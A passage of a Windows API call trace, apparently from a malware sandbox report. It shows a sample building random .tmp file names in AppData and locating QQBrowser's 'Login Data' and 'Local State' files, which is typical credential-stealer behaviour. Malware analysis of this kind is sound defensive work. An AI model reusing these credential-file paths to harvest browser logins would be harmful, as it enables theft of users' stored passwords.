returned 7 [0203.311] lstrlenA (lpString="wioHDCh") returned 7 [0203.311] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.312] lstrcpyA (in: lpString1=0x2d80000, lpString2="wioHDCh" | out: lpString1="wioHDCh") returned="wioHDCh" [0203.312] lstrlenA (lpString="wioHDCh") returned 7 [0203.312] lstrlenA (lpString="wioHDCh") returned 7 [0203.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.312] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.312] lstrlenA (lpString="wioHDCh") returned 7 [0203.312] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="wioHDCh") returned 8 [0203.312] lstrlenW (lpString="wioHDCh") returned 7 [0203.312] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.312] lstrlenW (lpString="wioHDCh") returned 7 [0203.312] lstrcpyW (in: lpString1=0x2e20000, lpString2="wioHDCh" | out: lpString1="wioHDCh") returned="wioHDCh" [0203.312] lstrlenW (lpString="wioHDCh") returned 7 [0203.312] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.313] lstrcpyW (in: lpString1=0x2eb0000, lpString2="wioHDCh" | out: lpString1="wioHDCh") returned="wioHDCh" [0203.313] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.313] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.313] lstrlenW (lpString="wioHDCh") returned 7 [0203.313] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.313] lstrcatW (in: lpString1="", lpString2="wioHDCh" | out: lpString1="wioHDCh") returned="wioHDCh" [0203.314] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.314] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.314] GetProcessHeap () returned 0x900000 [0203.314] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.314] lstrlenW (lpString="wioHDCh") returned 7 [0203.314] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.314] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.314] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.314] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.315] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="wioHDCh" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wioHDCh") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wioHDCh" [0203.315] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.315] lstrlenW (lpString=".tmp") returned 4 [0203.316] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.316] lstrlenW (lpString=".tmp") returned 4 [0203.316] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.316] lstrlenW (lpString=".tmp") returned 4 [0203.316] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wioHDCh") returned 53 [0203.316] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.316] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.316] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.317] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wioHDCh", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wioHDCh.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wioHDCh.tmp" [0203.317] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.317] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.317] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.317] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.317] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.317] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.317] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.317] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.318] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.318] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.318] lstrlenW (lpString="\\Tencent\\QQBrowser\\User Data\\Default\\Login Data") returned 47 [0203.318] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.318] lstrlenW (lpString="\\Tencent\\QQBrowser\\User Data\\Default\\Login Data") returned 47 [0203.318] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Tencent\\QQBrowser\\User Data\\Default\\Login Data" | out: lpString1="\\Tencent\\QQBrowser\\User Data\\Default\\Login Data") returned="\\Tencent\\QQBrowser\\User Data\\Default\\Login Data" [0203.318] lstrlenW (lpString="\\Tencent\\QQBrowser\\User Data\\Default\\Login Data") returned 47 [0203.318] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.318] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.318] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.319] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.319] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Tencent\\QQBrowser\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\Login Data" [0203.319] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.319] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.319] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.319] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.320] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.320] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.320] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.320] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.320] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.320] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.321] lstrlenW (lpString="\\Tencent\\QQBrowser\\User Data\\Local State") returned 40 [0203.321] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.321] lstrlenW (lpString="\\Tencent\\QQBrowser\\User Data\\Local State") returned 40 [0203.321] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Tencent\\QQBrowser\\User Data\\Local State" | out: lpString1="\\Tencent\\QQBrowser\\User Data\\Local State") returned="\\Tencent\\QQBrowser\\User Data\\Local State" [0203.321] lstrlenW (lpString="\\Tencent\\QQBrowser\\User Data\\Local State") returned 40 [0203.321] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.321] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.321] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.321] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.322] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Tencent\\QQBrowser\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Local State" [0203.322] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.322] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default\\Login Data") returned 0 [0203.322] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.322] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.322] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.323] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.323] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.323] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.323] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.323] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.323] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.323] lstrlenW (lpString="\\") returned 1 [0203.323] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.324] lstrlenW (lpString="\\") returned 1 [0203.324] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.324] lstrlenW (lpString="\\") returned 1 [0203.324] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.324] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.324] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.324] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.324] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.324] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.325] GetProcessHeap () returned 0x900000 [0203.325] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.325] lstrlenA (lpString="gonpso.") returned 7 [0203.325] lstrlenA (lpString="gonpso.") returned 7 [0203.325] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.325] lstrcpyA (in: lpString1=0x2d80000, lpString2="gonpso." | out: lpString1="gonpso.") returned="gonpso." [0203.325] lstrlenA (lpString="gonpso.") returned 7 [0203.325] lstrlenA (lpString="gonpso.") returned 7 [0203.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.325] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.326] lstrlenA (lpString="gonpso.") returned 7 [0203.326] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="gonpso.") returned 8 [0203.326] lstrlenW (lpString="gonpso.") returned 7 [0203.326] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.326] lstrlenW (lpString="gonpso.") returned 7 [0203.326] lstrcpyW (in: lpString1=0x2df0000, lpString2="gonpso." | out: lpString1="gonpso.") returned="gonpso." [0203.326] lstrlenW (lpString="gonpso.") returned 7 [0203.326] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.326] lstrcpyW (in: lpString1=0x2e20000, lpString2="gonpso." | out: lpString1="gonpso.") returned="gonpso." [0203.326] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.327] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.327] lstrlenW (lpString="gonpso.") returned 7 [0203.327] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.327] lstrcatW (in: lpString1="", lpString2="gonpso." | out: lpString1="gonpso.") returned="gonpso." [0203.327] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.328] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.328] GetProcessHeap () returned 0x900000 [0203.328] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.328] lstrlenW (lpString="gonpso.") returned 7 [0203.328] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.328] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.328] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.328] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.328] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="gonpso." | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gonpso.") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gonpso." [0203.329] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.329] lstrlenW (lpString=".tmp") returned 4 [0203.329] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.329] lstrlenW (lpString=".tmp") returned 4 [0203.329] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.329] lstrlenW (lpString=".tmp") returned 4 [0203.329] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gonpso.") returned 53 [0203.329] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.329] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.330] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.330] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gonpso.", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gonpso..tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gonpso..tmp" [0203.330] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.330] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.330] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.331] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.331] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.331] lstrlenW (lpString="\\") returned 1 [0203.331] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.331] lstrlenW (lpString="\\") returned 1 [0203.331] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.331] lstrlenW (lpString="\\") returned 1 [0203.331] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.331] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.331] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.332] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.332] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.332] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.332] GetProcessHeap () returned 0x900000 [0203.332] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.332] lstrlenA (lpString="tFcaaoi") returned 7 [0203.332] lstrlenA (lpString="tFcaaoi") returned 7 [0203.332] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.333] lstrcpyA (in: lpString1=0x2d80000, lpString2="tFcaaoi" | out: lpString1="tFcaaoi") returned="tFcaaoi" [0203.333] lstrlenA (lpString="tFcaaoi") returned 7 [0203.333] lstrlenA (lpString="tFcaaoi") returned 7 [0203.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.333] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.333] lstrlenA (lpString="tFcaaoi") returned 7 [0203.333] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="tFcaaoi") returned 8 [0203.333] lstrlenW (lpString="tFcaaoi") returned 7 [0203.333] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.333] lstrlenW (lpString="tFcaaoi") returned 7 [0203.333] lstrcpyW (in: lpString1=0x2e20000, lpString2="tFcaaoi" | out: lpString1="tFcaaoi") returned="tFcaaoi" [0203.334] lstrlenW (lpString="tFcaaoi") returned 7 [0203.334] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.334] lstrcpyW (in: lpString1=0x2eb0000, lpString2="tFcaaoi" | out: lpString1="tFcaaoi") returned="tFcaaoi" [0203.334] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.334] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.334] lstrlenW (lpString="tFcaaoi") returned 7 [0203.334] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.335] lstrcatW (in: lpString1="", lpString2="tFcaaoi" | out: lpString1="tFcaaoi") returned="tFcaaoi" [0203.335] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.335] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.335] GetProcessHeap () returned 0x900000 [0203.335] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.335] lstrlenW (lpString="tFcaaoi") returned 7 [0203.335] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.335] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.335] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.336] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.336] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="tFcaaoi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tFcaaoi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tFcaaoi" [0203.336] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.336] lstrlenW (lpString=".tmp") returned 4 [0203.336] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.337] lstrlenW (lpString=".tmp") returned 4 [0203.337] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.337] lstrlenW (lpString=".tmp") returned 4 [0203.337] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tFcaaoi") returned 53 [0203.337] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.337] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.337] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.337] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tFcaaoi", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tFcaaoi.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tFcaaoi.tmp" [0203.337] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.338] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.338] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.338] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.338] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.338] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.338] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.338] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, 